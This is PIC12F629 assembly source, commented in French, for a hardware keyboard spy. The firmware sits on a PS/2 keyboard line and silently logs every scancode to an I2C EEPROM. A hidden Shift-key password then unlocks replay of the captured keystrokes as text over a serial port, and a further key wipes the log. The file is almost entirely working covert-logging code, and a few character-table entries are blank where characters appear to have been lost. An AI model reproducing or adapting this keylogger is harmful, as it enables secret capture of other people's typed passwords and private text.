;********************************************************************
; G.SAMBLANCAT												2/2007 	*
;						 Espion de Clavier							*
; 																	*
;********************************************************************
 
			list r=dec

			include "P12F629.inc"
;Config Oscillateur interne 4mhz, pas de Watchdog
			__config	_INTRC_OSC_NOCLKOUT & _WDT_OFF  

;Definitions des variables 
			CBLOCK	0x20
			TPO1, TPO2, TPO3, TPO4
			RECV, PARITE, ACK
			ADROMH, ADROML		; tampons addr d'acces eeprom
			PTRWRH,PTRWRL		; adr prochaine ecriture en eeprom
			PASSPTR				; pointeur dans tables retlw
			LASTKEY				; memo dernier code tap
			XPOS				; position curseur X en cours affichage ecran
			endc

#Define		SDA		GPIO,0		; commande eeprom I2c
#Define		SCL		GPIO,1

#Define		COMDATA	GPIO,2		; data port COM

#Define		KCLK	GPIO,5		; com serie clavier 
#Define		KDATA	GPIO,4

#Define		AD24128_R	0A1h	; id de l'eeprom en Read
#Define		AD24128_W	0A0h	; id de l'eeprom en Write

#Define		MAXMSBROM	31		; msb adresse maxi de l'eeprom

#Define		REJEU_COD	069h	; scancode pour rejeu clav '1num'
#Define		RAZ_COD		071h	; scancode pour tout effacer '.suppr'

;****************************************************************
;    Debut prog
;****************************************************************
			org		0
start  		movlw	b'11111000'	 ; tout en entre sauf SCL,SDA
			bsf		STATUS,RP0

			movwf	TRISIO
			call	03ffh
  			movwf	OSCCAL

  			clrf	OPTION_REG
  			movlw	1				; enable pullup pour SDA
  			movwf	WPU
			bcf		STATUS,RP0		; rpasse BANK0

			movlw	07h
			movwf	CMCON

			movlw	0ffh
			movwf	GPIO		; SDA,SCL

;Retrouve la prochaine adresse vide en eeprom dans PTRWRH/L
			clrf	ADROML
			clrf	ADROMH
vide0		call	E2READ
			movf	RECV,0
			xorlw	0ffh
			btfsc	STATUS,Z
			goto	estvide
			incfsz	ADROML,1
			goto	vide0
			incf	ADROMH,1
			movf	ADROMH,0
			xorlw	MAXMSBROM+1
			btfss	STATUS,Z
			goto	vide0
			decf	ADROMH,1	; sature a la fin
			decf	ADROML,1	; de l'eeprom

estvide		movf	ADROML,0
			movwf	PTRWRL
			movf	ADROMH,0
			movwf	PTRWRH

clrpass		clrf	PASSPTR		; raz pointeur de code

;Attend un octet du clavier (dans RECV)
debut		call	GETKEYB

;Supprime tout les codes >F0h
			movf	RECV,0
			sublw	0f0h
			btfss	STATUS,C
			goto	debut
;Filtre toutes les sequences a base de E0...5MAKE 1 BREAK CODES
			movf	RECV,0
			xorlw	0E0h
			btfss	STATUS,Z
			goto	no_e0
			call	GETKEYB
			movf	RECV,0
			xorlw	0F0h
			btfss	STATUS,Z
			goto	clrpass
			call	GETKEYB
			goto	clrpass
			
;Teste si on rentre le mot de passe SECRET
;Filtre au passage les F0 et les char identiques
no_e0		movf	RECV,0
			xorlw	0F0h
			btfss	STATUS,Z	; recv=F0 -> fais rien va a rec?
			goto	tstpass
			call	GETKEYB
			goto	debut
			
tstpass		call	SECRET		; parcourt le mot de passe
			xorwf	RECV,0
			btfss	STATUS,Z
			goto	rec0?		; si faux -> suite & raz passe
			incf	PASSPTR,1
			call	SECRET
			xorlw	0ffh
			btfss	STATUS,Z
			goto	record

;Le prfixe LShift-RShift-... est pass on voit si
;'1fin' pour rejeu ou si '0Inser' pour record
pass2		call	GETKEYB
			movf	RECV,0
			xorlw	0F0h
			btfss	STATUS,Z	; attend le premier relachement
			goto	pass3		; de touche (break code)
			call	GETKEYB
			goto	pass2

;Test si raz general
pass3		movf	RECV,0
			xorlw	RAZ_COD
			btfsc	STATUS,Z
			goto	razmem

;Teste touche mode rejeu par clavier
			movf	RECV,0
			xorlw	REJEU_COD
			btfsc	STATUS,Z	;Lance un rejeu complet
			goto	rejeu
			goto	clrpass

;- - - - - - - - - - - - - - - - - - - - - - - - - - -
;  Efface toute la memoire...
;- - - - - - - - - - - - - - - - - - - - - - - - - - -
razmem		movlw	2
			call	MSGBOX		; envoi le message ' Effacage... '

			clrf	ADROMH
			clrf	ADROML
razrom		movlw	0ffh
			call	E2WRITE
			incfsz	ADROML,1
			goto	razrom
			incf	ADROMH,1
			movf	ADROMH,0
			andlw	1
			btfss	STATUS,Z
			goto	nopix
			movlw	'.'
			call	SENDCOM
nopix		movlw	MAXMSBROM+1
			xorwf	ADROMH,0
			btfss	STATUS,Z
			goto	razrom
			
			movlw	3
			call	MSGBOX		; envoi le message ' ok. '

;Raz le pointeur d'adresse (en ram et en eeprom)
;pour la prochaine ecriture en eeprom.
			clrf	PTRWRH
			clrf	PTRWRL
			clrf	ADROMH
			clrf	ADROML		; raz ptr d'ecriture au debut
			goto	clrpass

;- - - - - - - - - - - - - - - - - - - - - - - - - - -
;    En Mode recording -> stocke scancode
;- - - - - - - - - - - - - - - - - - - - - - - - - - - 
rec0?		clrf	PASSPTR

;Sauve l'octet recu
record		movf	PTRWRH,0
			movwf	ADROMH
			movf	PTRWRL,0
			movwf	ADROML
			movf	RECV,0
			call	E2WRITE		; sauve le nouveau scancode

;Incr le pointeur et controle fin de memoire
			incf	PTRWRL,1
			btfsc	STATUS,Z
			incf	PTRWRH,1
			movf	PTRWRH,0
			xorlw	MAXMSBROM	; par securite clear msb
			btfss	STATUS,Z	; si msb = 31 teste lsb
			goto	pasfini
			movf	PTRWRL,0
			xorlw	0FFh		; si =1FFF fini !
			btfss	STATUS,Z
			goto	pasfini

;Si fin de memoire -> bloque au bout
			movlw	0feh
			movwf	PTRWRL

;Resave nouvelles valeurs pointeur en eeprom
pasfini		goto	debut
		
;- - - - - - - - - - - - - - - - - - - - - - - - - - -
;    Fait le rejeu complet par Clavier / port COM
;- - - - - - - - - - - - - - - - - - - - - - - - - - -
rejeu		movlw	1
;Affiche le message d'annonce 'Mode Rejeu'
			call	MSGBOX

finmsg		clrf	XPOS		; raz le ctr de colonne ecran

;Prepare la lecture depuis le debut
			clrf	ADROML
			clrf	ADROMH
			
;Boucle de rejeu proprement dite...
looprej		call	E2READ
			movf	RECV,0
			xorlw	0ffh		; teste si fin fichier (ff)
			btfss	STATUS,Z
			goto	pasfinf
			
;rejeu termine fait CR/LF
finf		movlw	13
			call	SENDCOM
			movlw	10
			call	SENDCOM
			goto	clrpass

;Verifie si le scancode (RECV) est dans la liste des touches de
;fonctions speciales (FNKEY1 termine par kFIN=00)
pasfinf		clrf	PASSPTR
tstfn?		call	FNKEY1
			xorlw	0
			btfsc	STATUS,Z	; teste si fin de codes fn
			goto	nofnkey
			xorwf	RECV,0
			btfsc	STATUS,Z
			goto	fnkey
			incf	PASSPTR,1
			goto	tstfn?
;Si touche de fonction recherche le texte associ (d'indice PASSPTR)
;Postionne dans FNKEY2 sur le message numero PASSPTR (ou TPO3)
fnkey		incf	PASSPTR,0
			movwf	TPO3
			clrf	PASSPTR
syncmess	call	FNKEY2
			incf	PASSPTR,1
			xorlw	0
			btfsc	STATUS,Z	; tst si un '0'
			goto	afffn0
			goto	syncmess
afffn0		decf	TPO3,1		; on est sur un 0 (kFin)
			btfss	STATUS,Z	; dec le nb
			goto	syncmess

			movlw	' '			; met espace
			call	SENDCOM
;Lit le texte de la touche de fonction et affiche
afffn		call	FNKEY2
			xorlw	0
			btfsc	STATUS,Z	; test fin
			goto	finaffich0
			call	SENDCOM
			incf	PASSPTR,1
			goto	afffn
finaffich0	movlw	' '			; ajoute un space
			call	SENDCOM
			goto	finaffich
			
;Ce n'etait pas une touche speciale -> on l'envoie direct !
nofnkey		call	SCANASCII
			call	SENDCOM		; envoi octet direct

;Passe au suivant et voit si fini...
finaffich	incf	ADROML,1
			btfsc	STATUS,Z
			incf	ADROMH,1
			btfsc	STATUS,Z
			goto	finf
			goto	looprej

;-------------------------------------------------------------
;Attend et lit la frappe d'une touche au clavier
;Renvoie un octet dans RECV
;Use : TPO1, RECV, TPO2
GETKEYB		btfss	KCLK
			goto	GETKEYB
GETKB_		btfsc	KCLK
			goto	GETKB_		; attend niveau bas (start)

			movlw   8
			movwf   TPO1

_rkeyb0		btfss	KCLK
			goto	_rkeyb0		; attend niveau haut KCLK (start)
;Recoit les bits de donnees
_rkeyb1		btfsc	KCLK		; attend front bas KCLK
			goto	_rkeyb1
			call	TEMPO20		; attend demi-bit
			bcf     STATUS,C
			btfsc   KDATA		; prend KDATA
			bsf     STATUS,C
			rrf     RECV,1		
			decfsz  TPO1,1
			goto    _rkeyb0

_rkeyb6		btfss	KCLK
			goto	_rkeyb6		; attend niveau haut

;Passe le bit de parit (odd)
_rkeyb2		btfsc	KCLK
			goto	_rkeyb2		; attend niveau bas
_rkeyb3		btfss	KCLK
			goto	_rkeyb3		; attend niveau haut

;Passe le bit de stop (verifie que a 1)
_rkeyb4		btfsc	KCLK
			goto	_rkeyb4		; attend niveau bas
			btfss	KDATA
			goto	GETKEYB		; -> sort sans rien si STOP=0	
_rkeyb5		btfss	KCLK
			goto	_rkeyb5		; attend niveau haut

			goto	TEMPO300	; attend un peu et sort
			
;-----------------------------------------------------------
;Envoi W sur TXout a 9600 bauds
;Use: TPO1, TPO3, TPO2
SENDCOM		xorlw	0
			btfsc	STATUS,Z	; saute les 00
			retlw	00

			movwf   TPO3
			
            bsf     COMDATA
            call    TEMPO9600       ; bit de START
            nop
            nop
            nop

            movlw   8
            movwf   TPO1
            
loopc       rrf     TPO3,1      ; envoie les LSB first
            btfsc   STATUS,C	; et inverses
            goto    met1
            bsf     COMDATA
            goto    bitmis
met1        bcf     COMDATA

bitmis      call    TEMPO9600
            decfsz  TPO1,1
            goto    loopc

            bcf     COMDATA
            call    TEMPO9600    ; bit de STOP
			
            call    TEMPO9600    ; tempos
            call    TEMPO9600    ; tempos
            call    TEMPO9600
            retlw	00
;-----------------------------------------------------------
;Affiche le message no W en lisant dans la table PLAYMSG
;Use : TPO1, TPO2, TPO3, TPO4, RECV
MSGBOX		movwf	TPO4		; sauve le no

			clrf	PASSPTR
syncmsg		call	PLAYMSG
			incf	PASSPTR,1
			xorlw	0
			btfsc	STATUS,Z	; tst si un '0'
			goto	msgb1
			goto	syncmsg

msgb1		decf	TPO4,1		; on est sur un 0 (kFin)
			btfss	STATUS,Z	; dec le nb
			goto	syncmsg

;Lit le texte de la touche de fonction et affiche
msgb2		call	PLAYMSG
			xorlw	0
			btfsc	STATUS,Z	; test fin
			goto	msgb3
			call	SENDCOM
			incf	PASSPTR,1
			goto	msgb2
msgb3		retlw	00h
;---------------------------------------------------------------
;Lit l'e2prom a l'adresse courante sur RECV
E2READ      call    STARTI2
            movlw   AD24128_W	; ecrit l'adresse de lecture
            call    SENDI2      ; ( en write )

            movf    ADROMH,0
            call    SENDI2        ; high adress
            movf    ADROML,0
            call    SENDI2        ; low adress

            call    STARTI2
            movlw   AD24128_R	; ecrite adresse de lecture
            call    SENDI2		; ( en read )

            call    SDAIN         ; remet sda in
            call    READI2
            call    NOACKI2
            call    STOPI2
            
            retlw	00h
;--------------------------------------------------------------
;Envoie W a l'adresse courante E2prom
;Attend fin ecriture par polling du ACK (environ 5 mS)
E2WRITE     movwf   RECV          ; save W

			call    STARTI2
            movlw   AD24128_W
            call    SENDI2        ; ad chip en write
			call	TEMPO20

            movf    ADROMH,0
            call    SENDI2        ; high adress 
            call	TEMPO20

            movf    ADROML,0
            call    SENDI2        ; low adress
			call	TEMPO20
			
            movf    RECV,0
            call    SENDI2        ; data write
            call    STOPI2

fin_wr?		call	TEMPO750u
			call    STARTI2
            movlw   AD24128_W
            call    SENDI2        ; ad chip en write
			btfsc	ACK,0
			goto	fin_wr? 		; loop si NOACK
			retlw	0
;-----------------------------------------------------------
;Lecture  de un octet I2C dans RECV
;Use : TPO1, RECV
READI2		movlw   8
			movwf   TPO1

_loopc		nop                   ; Tempi
			bsf     SCL
			bcf     STATUS,C
			btfsc   SDA   
			bsf     STATUS,C
no_bit      rlf     RECV,1
			nop                   ; Tempi
			bcf     SCL
			decfsz  TPO1,1
			goto    _loopc
			retlw	0
;------------------------------------------------------------
;Envoi W vers I2C avec test si ACK of slave
;Met SDA & SCL OUT en sortie !!!
;Use: TPO1, TPO2
SENDI2      movwf   TPO2

			movlw   8
			movwf   TPO1

_loopa      rlf     TPO2,1
			btfsc   STATUS,C
			goto    _met1
			bcf     SDA   
			goto    _bitmis
_met1       bsf     SDA   

_bitmis     call    PULSE
			decfsz  TPO1,1
			goto    _loopa

			call    SDAIN		; passe SDA in
			bsf     SCL
			clrf	ACK
			btfsc	SDA			; renvoie le ACK
			incf	ACK,1
			bcf     SCL
			bsf		SDA
            call    SDAOUT
            retlw	0
;-----------------------------------------------------------
SDAIN       movlw   11111001b
			bsf     STATUS,RP0    
			movwf   TRISIO
			bcf     STATUS,RP0
			retlw	0

SDAOUT		movlw   11111000b
			bsf     STATUS,RP0  
			movwf   TRISIO
			bcf     STATUS,RP0
			retlw	0

;Fait un top positif sur SCL (pas touche a SDA)
NOACKI2     bsf     SDA

PULSE       bsf     SCL
			nop
			nop
			bcf     SCL   
			retlw	0

ACKI2       bcf     SDA
			call    PULSE        ; Ack of master
			bsf     SDA   
			retlw	0

STOPI2      bcf     SDA
			bsf     SCL          ; Stop
			nop                  ;
			nop
			bsf     SDA          ;   condition
			retlw	0

STARTI2		call    SDAOUT
			bsf     SDA
			bsf     SCL
			nop
			nop
			bcf     SDA            ; start Condition
			nop
			bcf     SCL   
			retlw	0

;--------------------------------------------------------
TEMPO300	movlw	058h		; tempo 280 uS
			goto	TEMPOx

TEMPO9600_2	movlw	14		; tempo 48 uS -> 1/2 bit 9600 bauds
			goto	TEMPOx
			
TEMPO9600	movlw	30		; tempo 100 uS -> 9600 bauds
			goto	TEMPOx

TEMPO20		movlw	05h		    ; tempo 20 uS
			goto	TEMPOx

;Tempo de 205mS - Use : TPO2, TPO3
TEMPO200M	clrf	TPO3
			call	_tpol1
TEMPO100M	clrf	TPO3
			goto	_tpol1

TEMPO50M	movlw	121
			movwf	TPO3

_tpol1		call	TEMPO750u
			decfsz	TPO3,1
			goto	_tpol1
			retlw	0

;Tempo de 750uS - Use : TPO2
TEMPO750u	movlw	250

;Tempo variable - Use : TPO2
TEMPOx		movwf	TPO2		; tempo variable longueur W
			decfsz	TPO2,1
			goto	$-1
			retlw	0

;--------------------------------------------------------
;Correspondances entre quelques touches et leur codes ASCII
;(avec NUM LOCK activ)

;Definition du mot de passe de restitution
			org		0200h
SECRET		movlw	2
			bsf		STATUS,RP0
			movwf	PCLATH
			bcf		STATUS,RP0
			movf	PASSPTR,0
			addwf	PCL,1									
			retlw	012h        ; Left SHIFT
			retlw	059h        ; Right SHIFT
			retlw	012h        ; Left SHIFT
			retlw	059h        ; Right SHIFT
			retlw	012h        ; Left SHIFT
			retlw	059h        ; Right SHIFT
			retlw	0ffh		; marque la fin du mot de passe
			
;Table des messages afficables prcds par un '00'
PLAYMSG		movlw	2
			bsf		STATUS,RP0
			movwf	PCLATH
			bcf		STATUS,RP0
			movf	PASSPTR,0
			addwf	PCL,1

			retlw	00		; msg 1
			retlw	13
			retlw	10
			retlw	'M'
			retlw	'o'
			retlw	'd'
			retlw	'e'
			retlw	' '
			retlw	'R'
			retlw	'e'
			retlw	'j'
			retlw	'e'
			retlw	'u'
			retlw	13
			retlw	10
			retlw	'-'
			retlw	'-'
			retlw	'-'
			retlw	'-'
			retlw	'-'
			retlw	'-'
			retlw	'-'
			retlw	'-'
			retlw	'-'
			retlw	'-'
			retlw	13
			retlw	10

			retlw	00h			; msg 2
			retlw	13
			retlw	10
			retlw	'E'
			retlw	'f'
			retlw	'f'
			retlw	'a'
			retlw	'c'		;	 message 'effacement '
			retlw	'e'
			retlw	'm'
			retlw	'e'
			retlw	'n'
			retlw	't'
			retlw	' '

			retlw	00
			retlw	' '
			retlw	'O'		; msg 3
			retlw	'k'		; message 'ok '
			retlw	'.'
			retlw	13
			retlw	10

			retlw	00h			; msg 4

;Liste des SCANCODES non affichables directement et reprsents par 
;un message en texte (list dans l'ordre dans FNKEY2)
FNKEY1		movlw	2
			bsf		STATUS,RP0
			movwf	PCLATH
			bcf		STATUS,RP0
			movf	PASSPTR,0
			addwf	PCL,1
									
			retlw	066h
			retlw	0Dh
			retlw	058h
			retlw	012h
			retlw	014h
			retlw	011h
			retlw	059h
			retlw	05Ah
			retlw	076h
			retlw	05h
			retlw	06h
			retlw	04h
			retlw	0Ch
			retlw	03h
			retlw	0Bh
			retlw	083h
			retlw	0Ah
			retlw	01h
			retlw	09h
			retlw	078h
			retlw	07h
			retlw	07Eh
			retlw	077h
			retlw	0

;Liste des messages correspondant aux touches de fonctions
FNKEY2		movlw	2
			bsf		STATUS,RP0
			movwf	PCLATH
			bcf		STATUS,RP0
			movf	PASSPTR,0
			addwf	PCL,1									

			retlw	0
			retlw	'B'
			retlw	'K'
			retlw	'S'
			retlw	'P'

			retlw	0
			retlw	'T'
			retlw	'A'
			retlw	'B'

			retlw	0
			retlw	'C'
			retlw	'A'
			retlw	'P'
			retlw	'S'

			retlw	0
			retlw	'S'
			retlw	'H'
			retlw	'I'
			retlw	'F'
			retlw	'T'

			retlw	0
			retlw	'C'
			retlw	'T'
			retlw	'R'
			retlw	'L'

			retlw	0
			retlw	'A'
			retlw	'L'
			retlw	'T'

			retlw	0
			retlw	'S'
			retlw	'H'
			retlw	'I'
			retlw	'F'
			retlw	'T'

			retlw	0
			retlw	'E'
			retlw	'N'
			retlw	'T'
			retlw	'E'
			retlw	'R'

			retlw	0
			retlw	'E'
			retlw	'S'
			retlw	'C'

			retlw	0
			retlw	'F'
			retlw	'1'

			retlw	0
			retlw	'F'
			retlw	'2'

			retlw	0
			retlw	'F'
			retlw	'3'

			retlw	0
			retlw	'F'
			retlw	'4'

			retlw	0
			retlw	'F'
			retlw	'5'

			retlw	0
			retlw	'F'
			retlw	'6'

			retlw	0
			retlw	'F'
			retlw	'7'

			retlw	0
			retlw	'F'
			retlw	'8'

			retlw	0
			retlw	'F'
			retlw	'9'

			retlw	0
			retlw	'F'
			retlw	'1'
			retlw	'0'

			retlw	0
			retlw	'F'
			retlw	'1'
			retlw	'1'

			retlw	0
			retlw	'F'
			retlw	'1'
			retlw	'2'

			retlw	0
			retlw	'S'
			retlw	'C'
			retlw	'R'
			retlw	'O'
			retlw	'L'
			retlw	'L'

			retlw	0
			retlw	'N'
			retlw	'U'
			retlw	'M'
			retlw	0

;Correspondance entre scancodes et codes Ascii
;Rentre sur RECV et sort sur W
			org		0300h
SCANASCII	movlw	3
			bsf		STATUS,RP0
			movwf	PCLATH
			bcf		STATUS,RP0
			movf	RECV,0
			addwf	PCL,1									

			retlw	0		; 0
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0		; 08
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	''
			retlw	0		; 0f	
			
			retlw	0		; 10
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	'a'		; 15
			retlw	'&'
			retlw	0
			retlw	0		; 18
			retlw	0
			retlw	'w'
			retlw	's'
			retlw	'q'		; 1c
			retlw	'z'
			retlw	''
			retlw	0		; 1f
			
			retlw	0		; 20
			retlw	'c'
			retlw	'x'
			retlw	'd'
			retlw	'e'
			retlw	'_'
			retlw	39		;'''
			retlw	0
			retlw	0		; 28
			retlw	' '
			retlw	'v'
			retlw	'f'
			retlw	't'
			retlw	'r'
			retlw	'('
			retlw	0		; 2f
			
			retlw	0		; 30
			retlw	'n'
			retlw	'b'
			retlw	'h'
			retlw	'g'
			retlw	'y'
			retlw	'-'
			retlw	0
			retlw	0		; 38
			retlw	0
			retlw	';'
			retlw	'j'
			retlw	'u'
			retlw	''
			retlw	'_'
			retlw	0		; 3f
			
			retlw	0		; 40
			retlw	','
			retlw	'k'
			retlw	'i'
			retlw	'o'
			retlw	''
			retlw	''
			retlw	0
			retlw	0		; 48
			retlw	':'
			retlw	'!'
			retlw	'l'
			retlw	'm'
			retlw	'p'
			retlw	')'
			retlw	0		; 4f

			retlw	0		; 50
			retlw	0
			retlw	''
			retlw	0
			retlw	'^'
			retlw	'='
			retlw	0
			retlw	0
			retlw	0		; 58
			retlw	0
			retlw	' '
			retlw	'$'		; 5b
			retlw	0
			retlw	0
			retlw	0
			retlw	0		; 5f
			
			retlw	0		; 60
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0
			retlw	0		; 68
			retlw	'1'
			retlw	0
			retlw	'4'		; 6b
			retlw	'7'
			retlw	0
			retlw	0
			retlw	0		; 6f
			
			retlw	'0'		; 70
			retlw	'.'
			retlw	50
			retlw	53
			retlw	54
			retlw	56
			retlw	0
			retlw	0
			retlw	0		; 78
			retlw	'+'
			retlw	'3'
			retlw	'-'		; 7b
			retlw	'*'
			retlw	'9'
			retlw	0
			retlw	0		; 7f

;*****************************************************
			END
